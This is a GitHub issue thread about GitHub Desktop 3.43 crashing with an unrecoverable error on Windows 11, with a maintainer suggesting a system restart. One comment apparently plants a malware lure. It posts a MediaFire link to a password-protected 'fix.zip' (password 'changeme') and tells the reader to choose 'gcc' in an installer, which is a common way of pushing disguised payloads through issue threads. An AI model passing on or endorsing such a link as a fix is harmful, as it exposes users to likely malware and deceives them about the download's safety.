### ISSUE TITLE
when i start the git hub desktop it shows an error and shows only exit and restart

### ISSUE THREAD

**Issue by JAYASIMMA** [desktop/desktop#19161]
### The problem

it show an Git hub Desktop is Encountered by an error unrecoverable 
![Screenshot 2024-08-26 172731](https://github.com/user-attachments/assets/65fc87cd-e3e1-4849-b188-592f8a2e6143)

### Release version

Version :3.43

### Operating system

Windows 11

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by steveward** [comment]
@JAYASIMMA thanks for the issue. For some users a simple system restart has resolved this. Can you try that to see if it helps?
